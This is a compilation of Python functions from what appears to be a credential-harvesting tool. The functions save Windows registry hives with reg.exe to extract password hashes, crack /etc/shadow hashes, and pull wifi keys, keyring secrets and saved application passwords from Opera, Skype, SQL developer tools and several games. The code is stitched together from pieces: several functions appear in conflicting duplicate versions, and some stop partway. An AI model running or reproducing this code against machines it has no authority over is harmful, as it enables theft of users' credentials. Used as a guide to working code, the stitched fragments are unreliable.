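def run(self):
    """Dump the registry hives listed in self.sysFile with reg.exe and hand them to retrieve_hash.

    Needs an elevated token (``reg.exe save hklm\\<hive>`` fails otherwise), so the
    method bails out early when IsUserAnAdmin() is false.  Each hive is written as
    ``<name>.save`` in the current working directory and deleted again afterwards;
    because those files hold password hashes, the cleanup runs in a ``finally``
    block so it also happens when retrieve_hash() raises.
    """
    # Need admin privileges
    if not windll.Shell32.IsUserAnAdmin():
        # only print the heading at INFO so the warning is not orphaned from it
        if logging.getLogger().isEnabledFor(logging.INFO):
            Header().title('Windows Secrets')
            print_debug('WARNING', '[!] This script should be run as admin!')
        return

    # print the title
    Header().title('Windows Secrets')

    # leftovers from an earlier run would make reg.exe refuse to overwrite
    if self.check_existing_systemFiles():
        self.delete_existing_systemFiles()

    # save system hives -- argument list, no shell involved in building the
    # command line; communicate() waits for reg.exe to finish writing
    for f in self.sysFile:
        proc = subprocess.Popen(
            ['reg.exe', 'save', 'hklm\\%s' % f, '%s.save' % f],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        proc.communicate()

    if not self.check_existing_systemFiles():
        print_debug('WARNING', 'Remove existing hive files and launch it again.')
        return

    try:
        retrieve_hash(self.address,
                      '%s.save' % self.sysFile[2],
                      '%s.save' % self.sysFile[1],
                      '%s.save' % self.sysFile[0],
                      self.ntds, self.history)
    finally:
        # remove hives files -- never leave hash material on disk, even on error
        self.delete_existing_systemFiles()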
def run(self):
    """Save the registry hives listed in self.sysFile with reg.exe (admin only).

    Prints a warning and returns when the process is not elevated.  Stale
    ``<hive>.save`` files are removed first; a failing ``reg.exe save`` is
    logged at DEBUG/ERROR and aborts the run.
    """
    # Need admin privileges
    if not windll.Shell32.IsUserAnAdmin():
        if logging.getLogger().isEnabledFor(logging.INFO):
            Header().title('Windows Secrets')
            print_debug('WARNING', '[!] This script should be run as admin!')
        return

    Header().title('Windows Secrets')

    # hive copies left behind by an earlier run are deleted before saving again
    if self.check_existing_systemFiles():
        self.delete_existing_systemFiles()

    for hive in self.sysFile:
        command = 'reg.exe save hklm\\%s %s.save' % (hive, hive)
        try:
            proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
            proc.stdout.read()
        except Exception as err:
            print_debug('DEBUG', '{0}'.format(err))
            print_debug('ERROR', 'Failed to save %s hive' % hive)
            return
def retrieve_password(self):
    """Collect the "wireless*" sections of every NetworkManager connection file.

    Reads /etc/NetworkManager/system-connections.  A hint is printed when not
    running as uid 0 (the files are typically not readable otherwise, and
    RawConfigParser.read() skips files it cannot open without raising).
    """
    Header().title_debug('Wifi (from Network Manager)')

    directory = '/etc/NetworkManager/system-connections'
    if not os.path.exists(directory):
        print_debug('ERROR', 'the path "%s" does not exist' % (directory))
        return

    if os.getuid() != 0:
        print_debug('INFO', 'You need more privileges (run it with sudo)\n')

    connection_files = [
        name for name in os.listdir(directory)
        if os.path.isfile(os.path.join(directory, name))
    ]

    pwdFound = []
    for name in connection_files:
        parser = RawConfigParser()
        parser.read(os.path.join(directory, name))
        entry = {'SSID': name}
        # every key of every section whose name contains "wireless"
        # (e.g. wireless, wireless-security) is copied verbatim
        for section in parser.sections():
            if 'wireless' in section:
                entry.update(parser.items(section))
        if entry:
            pwdFound.append(entry)

    print_output('Wifi', pwdFound)
def retrieve_password(self):
    """Locate SQL Developer's connection store and decrypt its saved passwords.

    get_mainPath() signals problems through sentinel strings ('Error',
    'SQL_NOT_EXISTS', 'SQL_NO_PASSWD'); get_passphrase() likewise returns
    'Not_Found' / 'xml_Not_Found' when the key material is missing.
    """
    Header().title_debug('SQL Developer')

    path_errors = {
        'Error': ('ERROR', 'The APPDATA environment variable is not definded.'),
        'SQL_NOT_EXISTS': ('INFO', 'SQL Developer not installed.'),
        'SQL_NO_PASSWD': ('INFO', 'No passwords found.'),
    }
    mainPath = self.get_mainPath()
    if mainPath in path_errors:
        print_debug(*path_errors[mainPath])
        return

    passphrase_errors = {
        'Not_Found': 'The passphrase used to encrypt has not been found.',
        'xml_Not_Found': 'The xml file containing the passphrase has not been found.',
    }
    passphrase = self.get_passphrase(mainPath)
    if passphrase in passphrase_errors:
        print_debug('ERROR', passphrase_errors[passphrase])
        return

    salt = self.get_salt()
    self.get_infos(mainPath, passphrase, salt)
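def run(self):
    """Extract the passwords old Opera versions keep in wand.dat.

    operaprefs.ini is consulted only to warn about a master password; wand.dat
    is parsed in every case and parse_results() runs when
    decipher_old_version() returned anything.  The master-password flag is
    read once instead of once per branch, as masterPasswordUsed() re-reads the
    preferences file.
    """
    Header().title_info('Opera')

    path = self.get_path()
    if not path:
        print_debug('INFO', 'Opera not installed.')
        return

    if not os.path.exists(path + os.sep + 'operaprefs.ini'):
        print_debug('INFO', 'The preference file operaprefs.ini has not been found.')
    else:
        master_flag = self.masterPasswordUsed(path)
        if master_flag == '0':
            print_debug('INFO', 'No master password defined.')
        elif master_flag == '1':
            # wand.dat is still parsed below; the entries found are not expected
            # to be usable as-is when a master password protects them
            print_debug('WARNING', 'A master password is used.')
        else:
            print_debug('WARNING', 'An error occurs, the use of master password is not sure.')

    print('')

    passwords = self.decipher_old_version(path)
    if passwords:
        self.parse_results(passwords)
    else:
        print_debug('INFO', 'The wand.dat seems to be empty')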
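def run(self):
    """Collect the password hashes from /etc/shadow and try to crack them.

    Requires root_access() and a readable self.filestr.  Every entry whose
    second field is not one of the placeholder markers 'x', '*', '!' is
    appended to self.hash and passed to self.attack(user, hash) for the
    dictionary / brute-force attempt.  Results go through print_output().
    The shadow file is now closed via a context manager, and lines without a
    second field (blank or malformed) are skipped instead of raising IndexError.
    """
    Header().title_info('System account (from /etc/shadow)')

    # check root access, then that the file can be opened
    if not self.root_access() or not self.check_file_access():
        return

    with open(self.filestr, 'r') as shadowFile:
        for raw_line in shadowFile:
            _hash = raw_line.rstrip('\n')
            fields = _hash.split(':')
            if len(fields) < 2:
                continue
            # check if a password is defined (locked/empty markers are skipped;
            # prefixed variants such as '!$6$...' are not filtered here)
            if fields[1] not in ['x', '*', '!']:
                user, cryptPwd = fields[0], fields[1]
                # save each non-empty hash
                self.hash += _hash + '\n'
                # try dictionary and bruteforce attack
                self.attack(user, cryptPwd)

    self.pwdFound.append({'Category': 'Hash', 'Hash': self.hash})
    print_output('System account (from /etc/shadow)', self.pwdFound)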
def print_output(software_name, pwdFound):
    """Report the credentials gathered for one application.

    An entry counts as a hit when one of its keys contains "password" or
    "key" (the latter for wifi entries); hits are counted in
    constant.nbPasswordFound and handed to checks_write().  Every field of
    every entry is logged at INFO regardless.  The title is printed here only
    when DEBUG logging is off (the module's title_debug() printed it otherwise).
    """
    if not pwdFound:
        logging.debug("[!] No passwords found\n")
        return

    if not logging.getLogger().isEnabledFor(logging.DEBUG):
        Header().title_info(software_name)

    toWrite = []
    for entry in pwdFound:
        names = [name.lower() for name in entry.keys()]
        has_password = any("password" in name for name in names)
        has_key = any("key" in name for name in names)  # for the wifi
        if not has_password and not has_key:
            print_debug("FAILED", "Password not found !!!")
        else:
            print_debug("OK", "Password found !!!")
            toWrite.append(entry)
            constant.nbPasswordFound += 1

        for field in entry.keys():
            logging.info("%s: %s" % (field, entry[field]))
        print('')

    # write credentials into a text file
    checks_write(toWrite, software_name)
def hashes_to_dic(self, title, format, content):
    """Turn a mapping of 'uid:rid:lmhash:nthash...' lines into result entries.

    Each NT hash gets a dictionary attack via bruteForce_Hash(); every uid is
    also pushed onto self.wordlist as a candidate.  Returns one
    {'Category': 'System account', 'user', 'password'} entry per cracked hash,
    followed by a final {'hashes': <all lines, CRLF separated>} entry.
    """
    Header().title1(title)
    print_debug('INFO', 'Format: (%s)' % format)

    pwdFound = []
    joined = '\r\n'
    for key in sorted(content):
        line = content[key]
        uid, rid, lmhash, nthash = line.split(':')[:4]
        self.wordlist.append(uid.encode("utf8"))
        joined = '%s\r\n%s' % (joined, line)

        cracked = self.bruteForce_Hash(nthash)
        if cracked:
            pwdFound.append({
                'Category': 'System account',
                'user': uid,
                'password': cracked,
            })

    pwdFound.append({'hashes': joined})
    return pwdFound
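def retrieve_password(self):
    """Recover the WLAN profiles stored under %ALLUSERSPROFILE% (admin only).

    Calls get_system_priv() (presumably to elevate to SYSTEM -- see that
    helper), then reads back <tempdir>\\TEMP123A.txt in INI format, which the
    elevated step is expected to have written, prints it and deletes it.
    The elevation failure path now logs the exception instead of a bare
    ``except:`` that also swallowed KeyboardInterrupt.
    """
    Header().title_debug('Wifi')

    if not windll.Shell32.IsUserAnAdmin():
        print_debug('ERROR', '[!] This script should be run as admin!')
        return

    if 'ALLUSERSPROFILE' not in os.environ:
        print_debug('ERROR', 'Environment variable (ALLUSERSPROFILE) has not been found.')
        return
    directory = os.environ['ALLUSERSPROFILE'] + os.sep + r'Microsoft\Wlansvc\Profiles\Interfaces'

    if not os.path.exists(directory):
        print_debug('INFO', 'No credentials found.\nFile containing passwords not found:\n%s' % directory)
        return

    try:
        print_debug('INFO', '[!] Trying to elevate our privilege')
        get_system_priv()
        print_debug('INFO', '[!] Elevation ok - Passwords decryption is in progress')
    except Exception as e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted')

    # the delay presumably gives the elevated step time to write its output -- TODO confirm
    time.sleep(5)

    # NOTE(review): a fixed file name in the shared temp directory is
    # predictable; another local user could pre-create or swap it before it
    # is read.  The name is dictated by the elevation helper, so it cannot be
    # changed here alone.
    filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt'
    if not os.path.exists(filepath):
        print_debug('INFO', 'No passwords found')
        return

    pwdFound = []
    cp = RawConfigParser()
    cp.read(filepath)
    for section in cp.sections():
        values = {}
        for name, value in cp.items(section):
            values[str(name)] = str(value)
        pwdFound.append(values)

    # the temp file holds the recovered secrets; remove it as soon as it is consumed
    os.remove(filepath)

    print_output("Wifi", pwdFound)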
def run(self):
    """List the CRED_TYPE_DOMAIN_VISIBLE_PASSWORD entries of the credential store.

    Each blob is passed through Win32CryptUnprotectData() with the entropy
    from get_entropy(); a blob that decrypts is reported as UTF-16 text, one
    that decrypts but does not decode is reported with an INFO note instead.
    """
    Header().title_info('Dot Net Passport')

    pwdFound = []
    for cred in self.get_creds() or []:
        if cred['Type'] != win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
            continue
        plaintext = self.Win32CryptUnprotectData(cred['CredentialBlob'], self.get_entropy())
        if plaintext == 'failed':
            continue
        entry = {'TargetName': cred['TargetName']}
        if cred['UserName'] is not None:
            entry['Username'] = cred['UserName']
        try:
            entry['Password'] = plaintext.decode('utf16')
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))
            entry['INFO'] = 'Error decoding the password'
        pwdFound.append(entry)

    print_output('Dot Net Passport', pwdFound)
def run(self):
    """Locate SQL Developer's connection store and decrypt its saved passwords.

    get_mainPath() and get_passphrase() report failures through sentinel
    strings; each one is turned into a log line and ends the run.
    """
    Header().title_debug('SQL Developer')

    mainPath = self.get_mainPath()
    if mainPath == 'SQL_NOT_EXISTS':
        print_debug('INFO', 'SQL Developer not installed.')
        return
    if mainPath == 'SQL_NO_PASSWD':
        print_debug('INFO', 'No passwords found.')
        return

    passphrase = self.get_passphrase(mainPath)
    if passphrase == 'Not_Found':
        print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
        return
    if passphrase == 'xml_Not_Found':
        print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
        return

    self.get_infos(mainPath, passphrase, self.get_salt())
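def run(self):
    """Recover the Kalypso Media Launcher login from launcher.ini.

    The stored password is base64 wrapped around an XOR with the fixed key
    below (undone by self.xorstring).  A missing %APPDATA%, a missing ini
    file, or an ini without the [styx user] section/options (or with a
    non-base64 password field) is reported instead of raising out of the run.
    """
    Header().title_info('Kalypso Media Launcher')

    key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'

    if 'APPDATA' not in os.environ:
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return
    inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'

    # The actual user details are stored in *.userdata files
    if not os.path.exists(inifile):
        print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
        return

    config = ConfigParser.ConfigParser()
    config.read(inifile)
    try:
        login = config.get('styx user', 'login')
        # get the encoded password
        cookedpw = base64.b64decode(config.get('styx user', 'password'))
    except (ConfigParser.Error, TypeError, ValueError) as e:
        # section/option absent, or the password field is not valid base64
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('ERROR', 'Could not read credentials from %s' % inifile)
        return

    creds = [{'Login': login, 'Password': self.xorstring(cookedpw, key)}]
    print_output("Kalypso Media Launcher", creds)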
def run(self):
    """Dump every item of every GNOME keyring through the gnomekeyring bindings.

    Refuses to run as root (see the message below).  For each item with
    attributes, the known attribute names are mapped to output fields and
    the item secret, when present, becomes the "Password" field.  Any
    exception from the bindings is reported as an ERROR line.
    """
    Header().title_debug('Gnome keyring')

    if os.getuid() == 0:
        print_debug('INFO', 'Do not run with root privileges)\n')
        return

    # attribute name -> output field; 'user' is applied after 'username_value'
    # so it wins when both are present, as in the original lookup order
    attribute_fields = (
        ('server', 'Server'),
        ('protocol', 'Protocol'),
        ('unique', 'Unique'),
        ('domain', 'Domain'),
        ('origin_url', 'Origin_url'),
        ('username_value', 'Username'),
        ('user', 'Username'),
    )

    try:
        import gnomekeyring
        keyrings = gnomekeyring.list_keyring_names_sync()
        if not keyrings:
            print_debug('WARNING', 'The Gnome Keyring wallet is empty')
            return

        pwdFound = []
        for keyring in keyrings:
            for item_id in gnomekeyring.list_item_ids_sync(keyring):
                item = gnomekeyring.item_get_info_sync(keyring, item_id)
                attr = gnomekeyring.item_get_attributes_sync(keyring, item_id)
                if not attr:
                    continue
                entry = {}
                if item.get_display_name():
                    entry["Item"] = item.get_display_name()
                for attr_name, field in attribute_fields:
                    if attr_name in attr:
                        entry[field] = attr[attr_name]
                if item.get_secret():
                    entry["Password"] = item.get_secret()
                if entry:
                    pwdFound.append(entry)

        print_output('Gnome keyring', pwdFound)
    except Exception as e:
        print_debug('ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def retrieve_password(self):
    """Read FTP Navigator's saved sites from its fixed install location.

    Only the hard-coded path C:\\FTP Navigator\\Ftplist.txt is checked.
    """
    Header().title_debug('FTP Navigator')
    ftplist = "C:\\FTP Navigator\\Ftplist.txt"
    if not os.path.exists(ftplist):
        print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % ftplist)
        return
    self.read_file(ftplist)
def run(self):
    """Parse Jitsi's properties file for stored credentials, if Jitsi is installed."""
    Header().title_info('Jitsi')
    file_properties = self.get_path()
    if file_properties != 'JITSI_NOT_EXISTS':
        self.get_info(file_properties)
    else:
        print_debug('INFO', 'Jitsi not installed.')
def run(self):
    """Locate the PuTTY Connection Manager database; a failing lookup is treated as "not installed"."""
    Header().title_info('Puttycm')
    try:
        database_path = self.get_default_database()
    except Exception as e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('INFO', 'Puttycm not installed')
        return
def run(self, historic=''):
    """Internet Explorer module entry point: drop the helper DLL (dll_name) to disk first.

    A failure to write the file is logged with the exception at DEBUG and an
    ERROR line naming dll_name.
    """
    Header().title_info('Internet Explorer')
    try:
        self.write_binary_file()
    except Exception as e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
def run(self):
    """Recover Skype credential hashes from every profile under %APPDATA%\\Skype.

    For each profile directory holding a config.xml, the stored blob is
    turned into an MD5 with the registry key from get_regkey() (the
    'shema to bruteforce' field documents the expected hash input), and
    dictionary_attack() tries to crack it.  Profiles without a stored
    credential are skipped with a warning; other per-profile errors are
    logged at DEBUG.  Nothing is printed when APPDATA is not set.
    """
    Header().title_info('Skype')

    if 'APPDATA' not in os.environ:
        return
    directory = os.environ['APPDATA'] + '\\Skype'
    if not os.path.exists(directory):
        print_debug('INFO', 'Skype not installed.')
        return

    # retrieve the key used to build the salt
    key = self.get_regkey()
    if key == 'failed':
        print_debug('ERROR', 'The salt has not been retrieved')
        return

    pwdFound = []
    for profile in os.listdir(directory):
        config_xml = directory + os.sep + profile + os.sep + 'config.xml'
        if not os.path.exists(config_xml):
            continue
        entry = {}
        try:
            entry['username'] = profile
            # get encrypted hash from the config file
            enc_hex = self.get_hash_credential(config_xml)
            if enc_hex == 'failed':
                print_debug('WARNING', 'No credential stored on the config.xml file.')
                continue
            # decrypt the hash to get the md5 to brute force
            entry['hash_md5'] = self.get_md5_hash(enc_hex, key)
            entry['shema to bruteforce'] = entry['username'] + '\\nskyper\\n<password>'
            cracked = self.dictionary_attack(entry['username'], entry['hash_md5'])
            if cracked:
                entry['password'] = cracked
            pwdFound.append(entry)
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))

    print_output("Skype", pwdFound)
def run(self):
    """Dump WinSCP's saved sessions unless a master password protects them."""
    Header().title_debug('WinSCP')

    if not self.check_winscp_installed():
        print_debug('INFO', 'WinSCP not installed.')
        return

    if self.check_masterPassword():
        print_debug('WARNING', 'A master password is used. Passwords cannot been retrieved')
        return

    # get_logins_info() hands back False when it could not read anything
    if self.get_logins_info() == False:
        print_debug('INFO', 'WinSCP not installed.')
def run(self):
    """Read wifi credentials from the wpa_supplicant configuration (root only)."""
    Header().title_info('Wifi (from WPA Supplicant)')

    # NOTE(review): a truthy check_file_access() ends the run, the opposite of
    # the "proceed when access is OK" shape used by the /etc/shadow module --
    # confirm that helper returns True on failure.
    if self.check_file_access():
        return

    # check root access
    if os.getuid() != 0:
        print_debug('INFO', 'You need more privileges (run it with sudo)\n')
        return

    print_output("wpa_supplicant", self.parse_file())
def run(self):
    """Parse Cyberduck's bookmark store; get_path() reports failures via sentinel strings."""
    Header().title_info('Cyberduck')

    outcomes = {
        'CYBERDUCK_NOT_EXISTS': ('INFO', 'Cyberduck not installed.'),
        'User_profil_not_found': ('INFO', 'User profil has not been found.'),
        'APPDATA_NOT_FOUND': ('ERROR', 'The APPDATA environment variable is not defined.'),
    }
    path = self.get_path()
    if path in outcomes:
        print_debug(*outcomes[path])
    else:
        self.parse_xml(path)
def run(self):
    """Decrypt DbVisualizer's stored connection passwords with its passphrase and salt."""
    Header().title_debug('DbVisualizer')
    mainPath = self.get_mainPath()
    if mainPath == 'DBVIS_NOT_EXISTS':
        print_debug('INFO', 'DbVisualizer not installed.')
        return
    passphrase = self.get_passphrase()
    self.get_infos(mainPath, passphrase, self.get_salt())
def run(self):
    """Parse Jitsi's properties file; get_path() signals a missing %APPDATA% or install."""
    Header().title_info('Jitsi')

    outcomes = {
        'Error': ('ERROR', 'The APPDATA environment variable is not defined'),
        'JITSI_NOT_EXISTS': ('INFO', 'Jitsi not installed.'),
    }
    file_properties = self.get_path()
    if file_properties in outcomes:
        print_debug(*outcomes[file_properties])
    else:
        self.get_info(file_properties)
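def retrieve_password(self):
    """Extract Skype credential hashes (no cracking) from every profile under %APPDATA%\\Skype.

    The blob in each profile's config.xml is turned into an MD5 with the
    registry key from get_regkey(); the 'shema to bruteforce' field tells the
    user what input the hash covers.  A failure on one profile is now logged
    at DEBUG and that profile skipped, instead of the former bare
    ``except: pass`` that also hid KeyboardInterrupt.
    """
    Header().title_debug('Skype')

    if 'APPDATA' not in os.environ:
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return
    directory = os.environ['APPDATA'] + '\\Skype'
    if not os.path.exists(directory):
        print_debug('INFO', 'Skype not installed.')
        return

    # retrieve the key used to build the salt
    key = self.get_regkey()
    if key == 'failed':
        print_debug('ERROR', 'The salt has not been retrieved')
        return

    pwdFound = []
    for profile in os.listdir(directory):
        config_xml = directory + os.sep + profile + os.sep + 'config.xml'
        if not os.path.exists(config_xml):
            continue
        values = {'Username': profile}
        try:
            # get encrypted hash from the config file
            enc_hex = self.get_hash_credential(config_xml)
            if enc_hex == 'failed':
                print_debug('WARNING', 'No credential stored on the config.xml file.')
                continue
            # decrypt the hash to get the md5 to brute force
            values['Hash_md5'] = self.get_md5_hash(enc_hex, key)
            values['shema to bruteforce'] = values['Username'] + '\\nskyper\\n<password>'
            pwdFound.append(values)
        except Exception as e:
            print_debug('DEBUG', '{0}'.format(e))

    print_output("Skype", pwdFound)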
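def retrieve_password(self):
    """Parse the default PuTTY Connection Manager database, if present.

    The reason get_default_database() failed is now logged at DEBUG (the
    former bare ``except:`` discarded it and also caught KeyboardInterrupt).
    """
    Header().title_debug('Puttycm')
    try:
        database_path = self.get_default_database()
    except Exception as e:
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('INFO', 'Puttycm not installed')
        return

    if not os.path.exists(database_path):
        print_debug('ERROR', 'Default database does not exist: %s' % database_path)
        return
    self.parse_xml(database_path)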
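def run(self):
    """Read FTP Navigator's Ftplist.txt from the root of %HOMEDRIVE%.

    A missing HOMEDRIVE variable is now reported as an ERROR line, matching
    how the other modules handle absent environment variables, instead of
    returning silently.
    """
    Header().title_info('FTP Navigator')

    if 'HOMEDRIVE' not in os.environ:
        print_debug('ERROR', 'The HOMEDRIVE environment variable is not defined.')
        return

    path = os.environ.get('HOMEDRIVE') + os.sep + 'FTP Navigator\\Ftplist.txt'
    if os.path.exists(path):
        self.read_file(path)
    else:
        print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)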
def retrieve_password(self):
    """Parse SQuirreL SQL's SQLAliases23.xml (located via get_path()) for saved aliases."""
    Header().title_debug('Squirrel')

    path = self.get_path()
    if path == 'Not_Found':
        print_debug('INFO', 'Squirrel not installed')
        return
    if path == 'var_Env_Not_Found':
        print_debug('ERROR', 'The HOMEPATH environment variable is not definded.')
        return

    xml_path = path + os.sep + 'SQLAliases23.xml'
    if not os.path.exists(xml_path):
        print_debug('ERROR', 'xml fil SQLAliases23.xml containing passwords has not be found')
        return
    self.parse_xml(xml_path)
def retrieve_password(self):
    """Parse SQuirreL SQL's SQLAliases23.xml (located via get_path()) for saved aliases."""
    Header().title_debug('Squirrel')

    path = self.get_path()
    if path == 'Not_Found':
        print_debug('INFO', 'Squirrel not installed')
        return

    xml_path = path + os.sep + 'SQLAliases23.xml'
    if not os.path.exists(xml_path):
        print_debug('WARNING', 'xml file containing passwords has not be found')
        return
    self.parse_xml(xml_path)
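def retrieve_password(self):
    """Scan the environment for proxy URLs and password-like variables.

    http(s)_proxy / HTTP(S)_Proxy are reported because proxy URLs may embed
    user:password.  Any other variable whose name contains passwd, pwd, pass
    or password is reported too, except the shell's PWD / OLDPWD.

    Fixes: the original reused one ``values`` dict for every finding, so
    pwdFound ended up holding N references to the last variable only; each
    finding now gets its own dict.  A variable matching several patterns
    (e.g. "PASSWORD" matches both 'pass' and 'password') is reported once.
    """
    Header().title_debug('Environnement variables')

    pwdFound = []

    # --------- http_proxy / https_proxy --------
    for spellings in (('http_proxy', 'HTTP_Proxy'), ('https_proxy', 'HTTPS_Proxy')):
        for name in spellings:
            if name in os.environ:
                pwdFound.append({"Variable": name, "Password": os.environ[name]})
                break  # the lowercase spelling takes precedence when both exist

    tab = ['passwd', 'pwd', 'pass', 'password']
    for name in os.environ:
        upper = name.upper()
        if upper in ('PWD', 'OLDPWD'):
            continue
        if any(pattern.upper() in upper for pattern in tab):
            pwdFound.append({"Variable": name, "Password": os.environ[name]})

    if pwdFound:
        print_output('Environnement variables', pwdFound)
    else:
        print_debug('INFO', 'No passwords stored in the environment variables.')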
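def run(self):
    """Pull the Galcon Fusion login from each Steam user's galcon.cfg.

    The Steam install path is read from HKCU\\Software\\Valve\\Steam\\SteamPath;
    galcon.cfg is looked up under <SteamPath>\\userdata\\<id>\\44200\\remote
    (44200 is presumably the game's Steam app id).  Login and password are
    fixed-offset fields of the binary file (bytes 4..0x22 and 0x24..0x42).
    The registry lookup failure is now logged and limited to ``Exception``
    instead of a bare ``except:`` that also swallowed KeyboardInterrupt.
    """
    Header().title_info('Galcon Fusion')

    # Find the location of steam via the registry
    try:
        with OpenKey(HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key:
            results = QueryValueEx(key, 'SteamPath')
    except Exception as e:
        # missing key/value, or no registry bindings at all on this platform
        print_debug('DEBUG', '{0}'.format(e))
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    if not results:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return

    userdata = results[0] + '\\userdata'
    # Check that we have a userdata directory
    if not os.path.exists(userdata):
        print_debug('ERROR', 'Steam doesn\'t have a userdata directory.')
        return

    # Now look for Galcon Fusion in every user
    creds = []
    for user_dir in os.listdir(userdata):
        cfg_path = userdata + '\\' + user_dir + '\\44200\\remote\\galcon.cfg'
        if not os.path.exists(cfg_path):
            continue
        with open(cfg_path, mode='rb') as cfgfile:
            data = cfgfile.read()
        # fixed-width fields; a file shorter than 0x43 bytes yields truncated
        # slices rather than an error -- TODO confirm the expected layout
        creds.append({'Login': data[4:0x23], 'Password': data[0x24:0x43]})

    print_output("Galcon Fusion", creds)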